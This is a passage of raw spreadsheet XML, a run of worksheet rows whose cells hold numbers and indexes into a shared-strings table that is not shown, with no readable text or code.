      <c r="W4288" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4288" s="12">
        <v>71</v>
      </c>
      <c r="Y4288" s="12" t="s">
        <v>27546</v>
      </c>
    </row>
    <row r="4289" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4289" s="12">
        <v>93461</v>
      </c>
      <c r="B4289" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4289" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="F4289" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4289" s="12" t="s">
        <v>27547</v>
      </c>
      <c r="H4289" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4289" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4289" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4289" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4289" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4289" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4289" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4289" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4289" s="12">
        <v>3.19</v>
      </c>
      <c r="Q4289" s="12">
        <v>3.19</v>
      </c>
      <c r="R4289" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4289" s="12" t="s">
        <v>27548</v>
      </c>
      <c r="T4289" s="12" t="s">
        <v>27549</v>
      </c>
      <c r="U4289" s="12" t="s">
        <v>27550</v>
      </c>
      <c r="V4289" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4289" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4289" s="12">
        <v>35</v>
      </c>
      <c r="Y4289" s="12" t="s">
        <v>27551</v>
      </c>
    </row>
    <row r="4290" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4290" s="12">
        <v>94221</v>
      </c>
      <c r="B4290" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4290" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4290" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F4290" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4290" s="12" t="s">
        <v>27552</v>
      </c>
      <c r="H4290" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4290" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4290" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K4290" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4290" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4290" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4290" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4290" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4290" s="12" t="s">
        <v>27553</v>
      </c>
      <c r="Q4290" s="12">
        <v>4</v>
      </c>
      <c r="R4290" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4290" s="12" t="s">
        <v>27554</v>
      </c>
      <c r="T4290" s="12" t="s">
        <v>27555</v>
      </c>
      <c r="U4290" s="12" t="s">
        <v>27556</v>
      </c>
      <c r="V4290" s="12" t="s">
        <v>27555</v>
      </c>
      <c r="W4290" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4290" s="12">
        <v>6</v>
      </c>
      <c r="Y4290" s="12" t="s">
        <v>27557</v>
      </c>
    </row>
    <row r="4291" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4291" s="12">
        <v>94341</v>
      </c>
      <c r="B4291" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4291" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4291" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F4291" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="G4291" s="12" t="s">
        <v>27558</v>
      </c>
      <c r="H4291" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4291" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4291" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4291" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4291" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4291" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4291" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4291" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4291" s="12">
        <v>3.16</v>
      </c>
      <c r="Q4291" s="12">
        <v>3.16</v>
      </c>
      <c r="R4291" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4291" s="12" t="s">
        <v>27559</v>
      </c>
      <c r="T4291" s="12" t="s">
        <v>27560</v>
      </c>
      <c r="U4291" s="12" t="s">
        <v>27561</v>
      </c>
      <c r="V4291" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4291" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4291" s="12">
        <v>19</v>
      </c>
      <c r="Y4291" s="12" t="s">
        <v>27562</v>
      </c>
    </row>
    <row r="4292" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4292" s="12">
        <v>94411</v>
      </c>
      <c r="B4292" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4292" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4292" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4292" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4292" s="12" t="s">
        <v>27563</v>
      </c>
      <c r="H4292" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4292" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4292" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4292" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4292" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4292" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4292" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4292" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4292" s="12">
        <v>3.19</v>
      </c>
      <c r="Q4292" s="12">
        <v>3.19</v>
      </c>
      <c r="R4292" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4292" s="12" t="s">
        <v>27564</v>
      </c>
      <c r="T4292" s="12" t="s">
        <v>27323</v>
      </c>
      <c r="U4292" s="12" t="s">
        <v>27565</v>
      </c>
      <c r="V4292" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4292" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4292" s="12">
        <v>52</v>
      </c>
      <c r="Y4292" s="12" t="s">
        <v>27566</v>
      </c>
    </row>
    <row r="4293" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4293" s="12">
        <v>94651</v>
      </c>
      <c r="B4293" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4293" s="12" t="s">
        <v>30833</v>
      </c>
      <c r="D4293" s="12" t="s">
        <v>30823</v>
      </c>
      <c r="E4293" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4293" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4293" s="12" t="s">
        <v>27567</v>
      </c>
      <c r="H4293" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4293" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4293" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4293" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4293" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4293" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4293" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4293" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4293" s="12" t="s">
        <v>27568</v>
      </c>
      <c r="Q4293" s="12">
        <v>3.18</v>
      </c>
      <c r="R4293" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4293" s="12" t="s">
        <v>27569</v>
      </c>
      <c r="T4293" s="12" t="s">
        <v>27570</v>
      </c>
      <c r="U4293" s="12" t="s">
        <v>27571</v>
      </c>
      <c r="V4293" s="12" t="s">
        <v>3812</v>
      </c>
      <c r="W4293" s="12" t="s">
        <v>27572</v>
      </c>
      <c r="X4293" s="12">
        <v>28</v>
      </c>
      <c r="Y4293" s="12" t="s">
        <v>27573</v>
      </c>
    </row>
    <row r="4294" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4294" s="12">
        <v>95061</v>
      </c>
      <c r="B4294" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4294" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4294" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4294" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4294" s="12" t="s">
        <v>27574</v>
      </c>
      <c r="H4294" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4294" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4294" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4294" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4294" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4294" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4294" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4294" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4294" s="12" t="s">
        <v>27575</v>
      </c>
      <c r="Q4294" s="12">
        <v>3.19</v>
      </c>
      <c r="R4294" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4294" s="12" t="s">
        <v>27576</v>
      </c>
      <c r="T4294" s="12" t="s">
        <v>26700</v>
      </c>
      <c r="U4294" s="12" t="s">
        <v>27577</v>
      </c>
      <c r="V4294" s="12" t="s">
        <v>27578</v>
      </c>
      <c r="W4294" s="12">
        <v>99941</v>
      </c>
      <c r="X4294" s="12">
        <v>10</v>
      </c>
      <c r="Y4294" s="12" t="s">
        <v>27579</v>
      </c>
    </row>
    <row r="4295" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4295" s="12">
        <v>95431</v>
      </c>
      <c r="B4295" s="12" t="s">
        <v>30225</v>
      </c>
      <c r="D4295" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E4295" s="18" t="s">
        <v>31448</v>
      </c>
      <c r="F4295" s="12" t="s">
        <v>30220</v>
      </c>
      <c r="G4295" s="12" t="s">
        <v>27580</v>
      </c>
      <c r="H4295" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4295" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J4295" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4295" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4295" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4295" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4295" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4295" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4295" s="12" t="s">
        <v>27581</v>
      </c>
      <c r="Q4295" s="12">
        <v>3.19</v>
      </c>
      <c r="R4295" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4295" s="12" t="s">
        <v>27582</v>
      </c>
      <c r="T4295" s="12" t="s">
        <v>27583</v>
      </c>
      <c r="U4295" s="12" t="s">
        <v>27541</v>
      </c>
      <c r="V4295" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W4295" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4295" s="12">
        <v>3</v>
      </c>
      <c r="Y4295" s="12" t="s">
        <v>27584</v>
      </c>
    </row>
    <row r="4296" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4296" s="12">
        <v>95661</v>
      </c>
      <c r="B4296" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C4296" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4296" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4296" s="12" t="s">
        <v>31446</v>
      </c>
      <c r="F4296" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4296" s="12" t="s">
        <v>27585</v>
      </c>
      <c r="H4296" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4296" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4296" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4296" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4296" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4296" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4296" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4296" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4296" s="12" t="s">
        <v>27586</v>
      </c>
      <c r="Q4296" s="12">
        <v>4</v>
      </c>
      <c r="R4296" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4296" s="12" t="s">
        <v>27587</v>
      </c>
      <c r="T4296" s="12" t="s">
        <v>27588</v>
      </c>
      <c r="U4296" s="12" t="s">
        <v>27589</v>
      </c>
      <c r="V4296" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4296" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4296" s="12">
        <v>10</v>
      </c>
      <c r="Y4296" s="12" t="s">
        <v>27590</v>
      </c>
    </row>
    <row r="4297" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4297" s="12">
        <v>95941</v>
      </c>
      <c r="B4297" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D4297" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F4297" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G4297" s="12" t="s">
        <v>27591</v>
      </c>
      <c r="H4297" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4297" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4297" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4297" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4297" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4297" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4297" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4297" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4297" s="12" t="s">
        <v>27592</v>
      </c>
      <c r="Q4297" s="12">
        <v>4</v>
      </c>
      <c r="R4297" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4297" s="12" t="s">
        <v>27593</v>
      </c>
      <c r="T4297" s="12" t="s">
        <v>27594</v>
      </c>
      <c r="U4297" s="12" t="s">
        <v>27595</v>
      </c>
      <c r="V4297" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4297" s="12" t="s">
        <v>27596</v>
      </c>
      <c r="X4297" s="12">
        <v>21</v>
      </c>
      <c r="Y4297" s="12" t="s">
        <v>27597</v>
      </c>
    </row>
    <row r="4298" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4298" s="12">
        <v>96111</v>
      </c>
      <c r="B4298" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4298" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4298" s="12" t="s">
        <v>31481</v>
      </c>
      <c r="F4298" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="G4298" s="12" t="s">
        <v>27604</v>
      </c>
      <c r="H4298" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4298" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4298" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4298" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4298" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4298" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4298" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4298" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4298" s="12">
        <v>3.17</v>
      </c>
      <c r="Q4298" s="12">
        <v>3.17</v>
      </c>
      <c r="R4298" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4298" s="12" t="s">
        <v>27605</v>
      </c>
      <c r="T4298" s="12" t="s">
        <v>27606</v>
      </c>
      <c r="U4298" s="12" t="s">
        <v>27607</v>
      </c>
      <c r="V4298" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4298" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4298" s="12">
        <v>15</v>
      </c>
      <c r="Y4298" s="12" t="s">
        <v>27608</v>
      </c>
    </row>
    <row r="4299" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4299" s="12">
        <v>96471</v>
      </c>
      <c r="B4299" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4299" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4299" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4299" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4299" s="12" t="s">
        <v>27609</v>
      </c>
      <c r="H4299" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4299" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4299" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4299" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4299" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4299" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4299" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4299" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4299" s="12" t="s">
        <v>27610</v>
      </c>
      <c r="Q4299" s="12">
        <v>4</v>
      </c>
      <c r="R4299" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4299" s="12" t="s">
        <v>27611</v>
      </c>
      <c r="T4299" s="12" t="s">
        <v>26222</v>
      </c>
      <c r="U4299" s="12" t="s">
        <v>27612</v>
      </c>
      <c r="V4299" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4299" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4299" s="12">
        <v>33</v>
      </c>
      <c r="Y4299" s="12" t="s">
        <v>27613</v>
      </c>
    </row>
    <row r="4300" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4300" s="12">
        <v>97141</v>
      </c>
      <c r="B4300" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4300" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4300" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4300" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4300" s="12" t="s">
        <v>27614</v>
      </c>
      <c r="H4300" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4300" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4300" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K4300" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4300" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4300" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4300" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4300" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4300" s="12">
        <v>4</v>
      </c>
      <c r="Q4300" s="12">
        <v>4</v>
      </c>
      <c r="R4300" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4300" s="12" t="s">
        <v>27615</v>
      </c>
      <c r="T4300" s="12" t="s">
        <v>22329</v>
      </c>
      <c r="U4300" s="12" t="s">
        <v>27616</v>
      </c>
      <c r="V4300" s="12" t="s">
        <v>5175</v>
      </c>
      <c r="W4300" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4300" s="12">
        <v>28</v>
      </c>
      <c r="Y4300" s="12" t="s">
        <v>27617</v>
      </c>
    </row>
    <row r="4301" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4301" s="12">
        <v>97181</v>
      </c>
      <c r="B4301" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4301" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4301" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4301" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4301" s="12" t="s">
        <v>27618</v>
      </c>
      <c r="H4301" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4301" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4301" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4301" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4301" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4301" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4301" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4301" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4301" s="12" t="s">
        <v>27619</v>
      </c>
      <c r="Q4301" s="12">
        <v>4</v>
      </c>
      <c r="R4301" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4301" s="12" t="s">
        <v>27620</v>
      </c>
      <c r="T4301" s="12" t="s">
        <v>27621</v>
      </c>
      <c r="U4301" s="12" t="s">
        <v>27622</v>
      </c>
      <c r="V4301" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4301" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4301" s="12">
        <v>55</v>
      </c>
      <c r="Y4301" s="12" t="s">
        <v>27623</v>
      </c>
    </row>
    <row r="4302" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4302" s="12">
        <v>97381</v>
      </c>
      <c r="B4302" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4302" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4302" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4302" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4302" s="12" t="s">
        <v>27630</v>
      </c>
      <c r="H4302" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4302" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4302" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K4302" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4302" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4302" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4302" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4302" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4302" s="12" t="s">
        <v>27631</v>
      </c>
      <c r="Q4302" s="12">
        <v>4</v>
      </c>
      <c r="R4302" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4302" s="12" t="s">
        <v>27632</v>
      </c>
      <c r="T4302" s="12" t="s">
        <v>27633</v>
      </c>
      <c r="U4302" s="12" t="s">
        <v>27634</v>
      </c>
      <c r="V4302" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4302" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4302" s="12">
        <v>47</v>
      </c>
      <c r="Y4302" s="12" t="s">
        <v>27635</v>
      </c>
    </row>
    <row r="4303" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4303" s="12">
        <v>97711</v>
      </c>
      <c r="B4303" s="12" t="s">
        <v>29788</v>
      </c>
      <c r="D4303" s="12" t="s">
        <v>29789</v>
      </c>
      <c r="E4303" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4303" s="12" t="s">
        <v>29829</v>
      </c>
      <c r="G4303" s="12" t="s">
        <v>27636</v>
      </c>
      <c r="H4303" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4303" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4303" s="12" t="s">
        <v>20775</v>
      </c>
      <c r="K4303" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4303" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4303" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4303" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4303" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4303" s="12" t="s">
        <v>27637</v>
      </c>
      <c r="Q4303" s="12">
        <v>4.0999999999999996</v>
      </c>
      <c r="R4303" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4303" s="12" t="s">
        <v>27638</v>
      </c>
      <c r="T4303" s="12" t="s">
        <v>27639</v>
      </c>
      <c r="U4303" s="12" t="s">
        <v>27640</v>
      </c>
      <c r="V4303" s="12" t="s">
        <v>20778</v>
      </c>
      <c r="W4303" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4303" s="12">
        <v>19</v>
      </c>
      <c r="Y4303" s="12" t="s">
        <v>27641</v>
      </c>
    </row>
    <row r="4304" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4304" s="12">
        <v>97921</v>
      </c>
      <c r="B4304" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4304" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4304" s="12" t="s">
        <v>31441</v>
      </c>
      <c r="F4304" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4304" s="12" t="s">
        <v>27642</v>
      </c>
      <c r="H4304" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4304" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4304" s="12" t="s">
        <v>13527</v>
      </c>
      <c r="K4304" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4304" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4304" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4304" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4304" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4304" s="12">
        <v>3.19</v>
      </c>
      <c r="Q4304" s="12">
        <v>3.19</v>
      </c>
      <c r="R4304" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S4304" s="12" t="s">
        <v>27643</v>
      </c>
      <c r="T4304" s="12" t="s">
        <v>27644</v>
      </c>
      <c r="U4304" s="12" t="s">
        <v>27645</v>
      </c>
      <c r="V4304" s="12" t="s">
        <v>27646</v>
      </c>
      <c r="W4304" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4304" s="12">
        <v>45</v>
      </c>
      <c r="Y4304" s="12" t="s">
        <v>27647</v>
      </c>
    </row>
    <row r="4305" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4305" s="12">
        <v>98591</v>
      </c>
      <c r="B4305" s="12" t="s">
        <v>30367</v>
      </c>
      <c r="C4305" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4305" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4305" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4305" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4305" s="12" t="s">
        <v>27648</v>
      </c>
      <c r="H4305" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4305" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4305" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4305" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4305" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4305" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4305" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4305" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4305" s="12" t="s">
        <v>27649</v>
      </c>
      <c r="Q4305" s="12">
        <v>4</v>
      </c>
      <c r="R4305" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4305" s="12" t="s">
        <v>27650</v>
      </c>
      <c r="T4305" s="12" t="s">
        <v>27651</v>
      </c>
      <c r="U4305" s="12" t="s">
        <v>27652</v>
      </c>
      <c r="V4305" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4305" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4305" s="12">
        <v>49</v>
      </c>
      <c r="Y4305" s="12" t="s">
        <v>27653</v>
      </c>
    </row>
    <row r="4306" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4306" s="12">
        <v>99691</v>
      </c>
      <c r="B4306" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4306" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4306" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4306" s="12" t="s">
        <v>31153</v>
      </c>
      <c r="G4306" s="12" t="s">
        <v>27660</v>
      </c>
      <c r="H4306" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4306" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4306" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4306" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4306" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4306" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4306" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4306" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4306" s="12" t="s">
        <v>27661</v>
      </c>
      <c r="Q4306" s="12">
        <v>4</v>
      </c>
      <c r="R4306" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4306" s="12" t="s">
        <v>27662</v>
      </c>
      <c r="T4306" s="12" t="s">
        <v>18261</v>
      </c>
      <c r="U4306" s="12" t="s">
        <v>27663</v>
      </c>
      <c r="V4306" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4306" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4306" s="12">
        <v>1</v>
      </c>
      <c r="Y4306" s="12" t="s">
        <v>27664</v>
      </c>
    </row>
    <row r="4307" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
